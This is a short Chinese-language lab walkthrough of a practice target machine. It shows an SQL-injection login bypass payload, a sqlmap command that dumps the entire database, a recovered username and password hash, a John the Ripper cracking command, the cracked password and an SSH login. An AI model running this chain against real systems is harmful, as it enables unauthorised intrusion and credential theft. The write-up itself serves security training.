sql相关靶机学习
根据题目提示,尝试sql注入
' or 1=1 #
用户名为上方sql语句,密码为空,进入到一个搜索页面
把request保存到txt文件尝试sqlmap跑一下
sqlmap --random-agent -r requests.txt --dbms=mysql --dump
该-r标志指定我刚才保存的请求文本文件,该--dbms标志指定目标系统正在运行的数据库管理系统(在本例中为 MySQL),该--dump标志指示sqlmap转储整个数据库。
最后,该--random-agent标志指示sqlmap使用随机浏览器用户代理字符串 得到用户和密码 agent47:ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14
数据库其他信息 跑一下hash
echo "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14" >> hash.txt
john hash.txt --format=Raw-SHA256 --wordlist=/usr/share/wordlists/rockyou.txt
得到密码
videogamer124
直接ssh获取到shell权限